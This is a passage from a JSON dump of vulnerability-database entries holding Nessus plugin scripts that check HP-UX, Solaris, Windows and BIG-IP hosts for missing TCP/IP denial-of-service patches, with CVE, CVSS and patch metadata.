make_list(\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.2.2\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.0.0-10.2.2\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"10.2.2HF2\",\"10.2.3-10.2.4\",\"11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:22", "description": "s700_800 11.04 (VVOS) ndd(1M) cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.", "cvss3": {"score": null, "vector": null}, "published": "2005-05-30T00:00:00", "type": "nessus", "title": "HP-UX PHNE_26076 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_26076.NASL", "href": "https://www.tenable.com/plugins/nessus/18398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_26076. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18398);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_26076 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 (VVOS) ndd(1M) cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning TCP/IP. This vulnerability could be remotely exploited by an\nunauthorized user to cause a Denial of Service(DoS). 
References: NISCC\nVU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_26076 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/03/21\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHNE_26076 applies to a different OS 
release.\");\n}\n\npatches = make_list(\"PHNE_26076\", \"PHNE_33789\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:16:55", "description": "s700_800 11.00 cumulative ARPA Transport patch : \n\nA potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.", "cvss3": {"score": null, "vector": null}, "published": "2005-08-01T00:00:00", "type": "nessus", "title": "HP-UX PHNE_33395 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_33395.NASL", "href": "https://www.tenable.com/plugins/nessus/19363", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_33395. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19363);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_33395 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 cumulative ARPA Transport patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning TCP/IP. This vulnerability could be remotely exploited by an\nunauthorized user to cause a Denial of Service(DoS). 
References: NISCC\nVU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_33395 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/19\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_33395 applies to a different OS 
release.\");\n}\n\npatches = make_list(\"PHNE_33395\", \"PHNE_35729\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-KRN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-PRG\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.NET2-KRN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.NMS2-KRN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE2-KRN\", version:\"B.11.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:27", "description": "SunOS 5.9: tcp Patch.\nDate this patch was last updated by Sun : Jul/09/07", "cvss3": {"score": null, "vector": null}, "published": "2005-04-17T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 118305-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2006-3920"], "modified": "2011-09-18T00:00:00", "cpe": [], "id": "SOLARIS9_118305.NASL", "href": "https://www.tenable.com/plugins/nessus/18075", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(18075);\n script_version(\"1.33\");\n\n script_name(english: \"Solaris 9 (sparc) : 118305-10\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2006-3920\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 118305-10\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.9: tcp Patch.\nDate this patch was last updated by Sun : Jul/09/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/118305-10\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/04/17\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/09/07\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 118305-10\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWcarx\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWcarx\", 
version:\"11.9.0,REV=2002.04.09.12.25\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWcsr\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWcsu\", version:\"11.9.0,REV=2002.04.06.15.27\");\ne += solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"118305-10\", obsoleted_by:\"114344-32 \", package:\"SUNWhea\", version:\"11.9.0,REV=2002.04.06.15.27\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_warning(0);\n\telse \n\t security_warning(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:21", "description": "s700_800 11.00 ndd(1M) cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX running TCP/IP. This vulnerability could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS). References: NISCC VU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.", "cvss3": {"score": null, "vector": null}, "published": "2005-05-30T00:00:00", "type": "nessus", "title": "HP-UX PHNE_26125 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_26125.NASL", "href": "https://www.tenable.com/plugins/nessus/18399", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_26125. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18399);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\");\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"532967\");\n script_xref(name:\"HP\", value:\"emr_na-c00576017\");\n script_xref(name:\"HP\", value:\"HPSBUX01164\");\n script_xref(name:\"HP\", value:\"SSRT4884\");\n\n script_name(english:\"HP-UX PHNE_26125 : HP-UX TCP/IP Remote Denial of Service (DoS) (HPSBUX01164 SSRT4884 rev.9)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 ndd(1M) cumulative patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning TCP/IP. This vulnerability could be remotely exploited by an\nunauthorized user to cause a Denial of Service(DoS). 
References: NISCC\nVU#532967, CAN-2004-0790, CAN-2004-0791, CAN-2004-1060.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00576017\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a3e8ad7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_26125 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/02/11\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2006/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/04/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_26125 applies to a different OS 
release.\");\n}\n\npatches = make_list(\"PHNE_26125\", \"PHNE_31965\", \"PHNE_35730\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.NET-RUN\", version:\"B.11.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:17:26", "description": "SunOS 5.9_x86: tcp Patch.\nDate this patch was last updated by Sun : Jul/09/07", "cvss3": {"score": null, "vector": null}, "published": "2005-04-17T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 117470-09", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2006-3920"], "modified": "2011-09-18T00:00:00", "cpe": [], "id": "SOLARIS9_X86_117470.NASL", "href": "https://www.tenable.com/plugins/nessus/18079", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! 
defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(18079);\n script_version(\"1.30\");\n\n script_name(english: \"Solaris 9 (x86) : 117470-09\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2006-3920\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 117470-09\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.9_x86: tcp Patch.\nDate this patch was last updated by Sun : Jul/09/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/117470-09\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/04/17\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/09/07\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 117470-09\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"117470-09\", obsoleted_by:\"119435-20 \", package:\"SUNWcsr\", version:\"11.9.0,REV=2002.11.04.02.51\");\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"117470-09\", obsoleted_by:\"119435-20 \", package:\"SUNWcsu\", 
version:\"11.9.0,REV=2002.11.04.02.51\");\ne += solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"117470-09\", obsoleted_by:\"119435-20 \", package:\"SUNWhea\", version:\"11.9.0,REV=2002.11.04.02.51\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_warning(0);\n\telse \n\t security_warning(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:15:18", "description": "The remote host runs a version of Windows that has a flaw in its TCP/IP IPv6 stack.\n\nThe flaw could allow an attacker to perform a denial of service attack against the remote host.\n\nTo exploit this vulnerability, an attacker needs to send a specially crafted ICMP or TCP packet to the remote host.", "cvss3": {"score": null, "vector": null}, "published": "2006-10-10T00:00:00", "type": "nessus", "title": "MS06-064: Vulnerability in TCP/IP IPv6 Could Allow Denial of Service (922819)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0230", "CVE-2005-0688"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS06-064.NASL", "href": "https://www.tenable.com/plugins/nessus/22537", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22537);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2004-0790\",\"CVE-2004-0230\",\"CVE-2005-0688\");\n script_bugtraq_id(13124, 13658);\n script_xref(name:\"CERT\", value:\"415294\");\n script_xref(name:\"CERT\", value:\"222750\");\n script_xref(name:\"CERT\", value:\"396645\");\n script_xref(name:\"MSFT\", value:\"MS06-064\");\n script_xref(name:\"MSKB\", value:\"922819\");\n\n script_name(english:\"MS06-064: Vulnerability in TCP/IP IPv6 Could Allow Denial of Service (922819)\");\n script_summary(english:\"Checks the remote 
registry for 922819\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to crash the remote host due to a flaw in the TCP/IP\nIPv6 stack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host runs a version of Windows that has a flaw in its\nTCP/IP IPv6 stack.\n\nThe flaw could allow an attacker to perform a denial of service attack\nagainst the remote host.\n\nTo exploit this vulnerability, an attacker needs to send a specially\ncrafted ICMP or TCP packet to the remote host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-064\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-064';\nkb = '922819';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"Tcpip6.sys\", version:\"5.2.3790.576\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Tcpip6.sys\", version:\"5.2.3790.2771\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"Tcpip6.sys\", version:\"5.1.2600.1886\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Tcpip6.sys\", version:\"5.1.2600.2975\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_warning();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:16:53", "description": "s700_800 11.11 cumulative ARPA Transport patch : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified with HP-UX running TCP/IP (IPv4). 
